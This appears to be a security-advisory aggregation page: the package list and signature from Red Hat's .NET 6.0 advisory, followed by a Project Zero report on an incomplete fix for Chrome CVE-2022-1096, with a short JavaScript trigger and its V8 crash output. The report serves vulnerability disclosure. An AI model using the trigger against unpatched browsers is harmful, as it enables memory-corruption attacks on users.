netstandard-targeting-pack-2.1-6.0.106-1.el9_0.s390x.rpm

x86_64:  
aspnetcore-runtime-6.0-6.0.6-1.el9_0.x86_64.rpm  
aspnetcore-targeting-pack-6.0-6.0.6-1.el9_0.x86_64.rpm  
dotnet-apphost-pack-6.0-6.0.6-1.el9_0.x86_64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.6-1.el9_0.x86_64.rpm  
dotnet-host-6.0.6-1.el9_0.x86_64.rpm  
dotnet-host-debuginfo-6.0.6-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-6.0.6-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.6-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-6.0.6-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.6-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-6.0.106-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.106-1.el9_0.x86_64.rpm  
dotnet-targeting-pack-6.0-6.0.6-1.el9_0.x86_64.rpm  
dotnet-templates-6.0-6.0.106-1.el9_0.x86_64.rpm  
dotnet6.0-debuginfo-6.0.106-1.el9_0.x86_64.rpm  
dotnet6.0-debugsource-6.0.106-1.el9_0.x86_64.rpm  
netstandard-targeting-pack-2.1-6.0.106-1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.6-1.el9_0.aarch64.rpm  
dotnet-host-debuginfo-6.0.6-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.6-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.6-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.106-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.106-1.el9_0.aarch64.rpm  
dotnet6.0-debuginfo-6.0.106-1.el9_0.aarch64.rpm  
dotnet6.0-debugsource-6.0.106-1.el9_0.aarch64.rpm

s390x:  
dotnet-apphost-pack-6.0-debuginfo-6.0.6-1.el9_0.s390x.rpm  
dotnet-host-debuginfo-6.0.6-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.6-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.6-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.106-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.106-1.el9_0.s390x.rpm  
dotnet6.0-debuginfo-6.0.106-1.el9_0.s390x.rpm  
dotnet6.0-debugsource-6.0.106-1.el9_0.s390x.rpm

x86_64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.6-1.el9_0.x86_64.rpm  
dotnet-host-debuginfo-6.0.6-1.el9_0.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.6-1.el9_0.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.6-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.106-1.el9_0.x86_64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.106-1.el9_0.x86_64.rpm  
dotnet6.0-debuginfo-6.0.106-1.el9_0.x86_64.rpm  
dotnet6.0-debugsource-6.0.106-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-30184  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqpyPtzjgjWX9erEAQh7fw//TkmxwxYo7fE3ctKmKXGmmYWEMRzfG6ye  
8qOZ9wJO/3uniZ4Ia301CK6fvR//pxCuDG/utC2Ol5auemsDY64cmZGa0KRQr0Mb  
d9a5KjkNuXH+Vj53zTM/2BEypVqdwwKDWxCxZPIsRKOSYo0VjsulK1C7wPEvGJNi  
vyfUwUPSOVcRCVFjll+EtI8uECY79gNrREck0Ai5gcEJhcmdkZO2c9HdACLVBlXa  
OJh9qPv3/Ug5L4DFygTqPhrafin5XvSa4FaRbm4tKmEr7o9QDtHf28O/R8Wr8uFK  
+C5iJwFghfAZ70hk5/AxmOnalS7g3xqdbKzNO7DHYL+tpUlqSHg0Z2rSTCTzRuAm  
oMRwM+83VNtCjxdqvWxobx6bQpwu9Dm/Wr+oKxBX3Tq4p2z/L61PwhAc6w3QTcmG  
4vFmbuxBpQ7J2QjwuKggb4pikeKmZjW2ZpbSpW3bLl/dcrhhGDYNU2dm2KzeEPLP  
+bsqKAJ9hS/6fTAZfNP0otB1dstGj1ZTMESSm6cHsQfvY6JJNpR+qswfURfiQR5z  
peSl3CeDhuOaSpUgG3l7djnFDU5dVszDtzcpwkZ9135pH4+MWomtxF9A6SruPtI6  
aJ3K5P60BICpE/fPf2FvO0MLdxkBjn+hKn/+5sa3VawyPFEVnshSlrv+Z9zK/AOg  
qdEhhuU7yrI=  
=L4aX  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5050-01

Chrome suffers from having an incomplete fix for CVE-2022-1096.

    Chrome: Incomplete fix for CVE-2022-1096VULNERABILITY DETAILSThe fix for https://crbug.com/1309225 has modified `SetPropertyInternal()` to fall back to `SetSuperProperty()` whenever a property access interceptor is encountered because `SetSuperProperty()` is robust against possible side effects caused by interceptors.Unfortunately, the function `JSObject::DefineOwnPropertyIgnoreAttributes()` is also affected by the bug and requires the same change.VERSIONGoogle Chrome 100.0.4896.60 (Official Build) (arm64)Chromium 102.0.4972.0 (Developer Build) (64-bit)REPRODUCTION CASETo make the exploit functional again, the attacker only needs to replace one property store with an `Object.defineProperty()` call:```<script>style = document.createElement('p').style;Object.defineProperty(style, 'prop', {  value: { toString() { style.prop = 1 } }});</script>```The repro case above triggers the same DCHECK failure:```## Fatal error in ../../v8/src/objects/map.cc, line 437# Debug check failed: map->instance_descriptors(isolate) .Search(*name, map->NumberOfOwnDescriptors()) .is_not_found().#```CREDIT INFORMATIONSergei Glazunov of Google Project ZeroThis bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2022-06-28.Related CVE Numbers: CVE-2022-1232,CVE-2022-1096.Found by: glazunov@google.com

Tag

#js